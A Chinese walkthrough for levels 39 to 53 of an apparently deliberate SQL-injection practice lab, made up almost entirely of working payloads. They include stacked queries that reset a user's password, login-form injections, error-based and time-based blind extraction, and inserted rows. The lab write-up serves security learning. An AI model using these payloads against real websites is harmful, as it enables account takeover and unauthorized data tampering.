目录
第三十九关:
第四十关:
第四十一关:
第四十二关:
第四十三关:
第四十四关:
第四十五关:
第四十六关:
第四十七关:
第四十八关:
第四十九关:
第五十关:
第五十一关:
第五十二关:
第五十三关:
第三十九关:
?id=1 and 1=1--+
?id=1 and 1=2--+
?id=1;update users set password='123456' where username='Dumb'--+
#修改成功
?id=1
第四十关:
?id=1' #无回显
?id=1" #回显
?id=1' --+ #无回显
?id=1" --+ #回显
?id=1') --+ #回显
?id=1')and 1=1--+ #回显
?id=1')and 1=2--+ #无回显
#用')闭合成功
payload
?id=1');update users set password='test' where username='Dumb'--+
第四十一关:
无报错,且是个数字型
payload
?id=1;update users set password='test' where username='Dumb'--+
第四十二关:
payload
login_user=admin&login_password=admin';update users set password='123456' where username='Dumb'#&mysubmit=Login
用修改后的密码登录,登录成功
login_user=Dumb&login_password=123456#&mysubmit=Login
第四十三关:
和四十二关思路一样,闭合使用')
login_user=admin&login_password=admin');update users set password='test' where username='Dumb'#&mysubmit=Login
用修改后的密码登录,登录成功
login_user=Dumb&login_password=test#&mysubmit=Login
第四十四关:
payload
login_user=admin&login_password=admin';update users set password='123456' where username='Dumb'#&mysubmit=Login
用修改后的密码登录,登录成功
login_user=Dumb&login_password=123456#&mysubmit=Login
第四十五关:
payload
login_user=admin&login_password=admin');update users set password='test' where username='Dumb'#&mysubmit=Login
第四十六关:
?sort=1
?sort=1 desc--+
发现可以注入,上payload
?sort=(extractvalue(0,concat(0x7e,database())))--+
第四十七关:
?sort=1'"--+
#报错"-- ' 用'闭合
payload
?sort=1'and extractvalue(0,concat(0x7e,database()))--+
第四十八关:
同四十六关,不能用报错
?sort=1%20and%20if(length(database())=8,sleep(2),1)--+
第四十九关:
同四十七关,不能用报错
?sort=1'%20and%20if(length(database())=8,sleep(2),1)--+
第五十关:
?sort=1'"--+
#报错 ''"--' 应该是数字型
payload
?sort=1 and updatexml(1,concat(0x7e,database()),0)--+
看源码使用了mysqli_multi_query函数,说明可以用堆叠注入
?sort=1;insert users values(123,'abc',123)--+
添加数据成功
第五十一关:
?sort=1'"--+
#报错"-- ' 用'来闭合
payload
?sort=1' and updatexml(1,concat(0x7e,database()),0)--+
尝试堆叠注入
?sort=1';insert users values(124,'abc',124)--+
?sort=1 #堆叠注入成功
第五十二关:
同四十八关,不能报错,但这里可以用堆叠注入
payload:
?sort=1%20and%20if(length(database())=8,sleep(2),1)--+
?sort=1;insert users values(125,'abc',125)--+
第五十三关:
?sort=1' #无回显
?sort=1'--+ #有回显
payload
?sort=1';insert users values(15,'abc',15)--+